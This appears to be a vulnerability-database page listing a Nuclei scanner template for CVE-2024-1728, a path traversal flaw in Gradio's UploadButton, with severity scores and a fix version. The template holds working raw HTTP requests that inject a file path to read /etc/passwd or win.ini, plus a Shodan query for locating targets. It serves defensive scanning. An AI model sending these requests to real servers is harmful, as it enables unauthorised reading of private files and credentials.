Lucene search
ProjectDiscoveryNUCLEI:CVE-2024-1728HistoryJun 15, 2024 - 12:36 p.m.
Gradio > 4.19.1 UploadButton - Path Traversal
2024-06-1512:36:40
ProjectDiscovery
github.com
4
cve2024
lfi
gradio
intrusion
fileinclusion
filesystem
vulnerability
remediation
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
6.4 Medium
AI Score
Confidence
Low
0.001 Low
EPSS
Percentile
21.5%
gradio-app/gradio is vulnerable to a local file inclusion vulnerability due to improper validation of user-supplied input in the UploadButton component.
id: CVE-2024-1728
info:
name: Gradio > 4.19.1 UploadButton - Path Traversal
author: isacaya
severity: high
description: |
gradio-app/gradio is vulnerable to a local file inclusion vulnerability due to improper validation of user-supplied input in the UploadButton component.
impact: |
Attackers can exploit this vulnerability to read arbitrary files on the filesystem, such as private SSH keys, by manipulating the file path in the request to the `/queue/join` endpoint. This issue could potentially lead to remote code execution. The vulnerability is present in the handling of file upload paths, allowing attackers to redirect file uploads to unintended locations on the server.
remediation: |
Update to version 4.19.2.
reference:
- https://github.com/gradio-app/gradio/commit/16fbe9cd0cffa9f2a824a0165beb43446114eec7
- https://huntr.com/bounties/9bb33b71-7995-425d-91cc-2c2a2f2a068a
- https://nvd.nist.gov/vuln/detail/CVE-2024-1728
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-1728
cwe-id: CWE-22
epss-score: 0.00044
epss-percentile: 0.10164
metadata:
max-request: 5
verified: true
vendor: gradio
product: gradio
shodan-query: html:"__gradio_mode__"
tags: cve,cve2024,lfi,gradio,intrusive
http:
- raw:
- |
POST /queue/join? HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"data":[[{"path":"{{path}}","url":"{{BaseURL}}/file=/help","orig_name":"CHANGELOG.md","size":3549,"mime_type":"text/markdown"}]],"event_data":null,"fn_index":0,"trigger_id":2,"session_hash":"{{randstr}}"}
- |
GET /queue/data?session_hash={{randstr}} HTTP/1.1
Host: {{Hostname}}
- |
GET /file={{extracted_path}} HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: extracted_path
regex:
- "/tmp/gradio/.*/passwd"
- "C:.*\\win\\.ini"
internal: true
payloads:
path:
- /etc/passwd
- /windows/win.ini
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
- type: status
status:
- 200
# digest: 4a0a0047304502200f825f20fad4b54e4c1edb052482ff3d57c02b63e05a9cf6227b37d39ebee112022100b36cc92a5b2685c8da867167fa0fdc31e99e6d9d6a461ff14467d518c3904dc2:922c64590222798bb761d5b6d8e72950Related
osv
osv
CVE-2024-1728
2024-04-10 17:15:53
Gradio Local File Inclusion vulnerability
2024-04-10 18:30:48
veracode
veracode
Local File Inclusion (LFI)
2024-04-12 10:13:46
cvelist
cvelist
CVE-2024-1728 Local File Inclusion in gradio-app/gradio
2024-04-10 17:07:56
nvd
nvd
CVE-2024-1728
2024-04-10 17:15:53
cve
cve
CVE-2024-1728
2024-04-10 17:15:53
vulnrichment
vulnrichment
CVE-2024-1728 Local File Inclusion in gradio-app/gradio
2024-04-10 17:07:56
github
github
Gradio Local File Inclusion vulnerability
2024-04-10 18:30:48
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
6.4 Medium
AI Score
Confidence
Low
0.001 Low
EPSS
Percentile
21.5%
Related for NUCLEI:CVE-2024-1728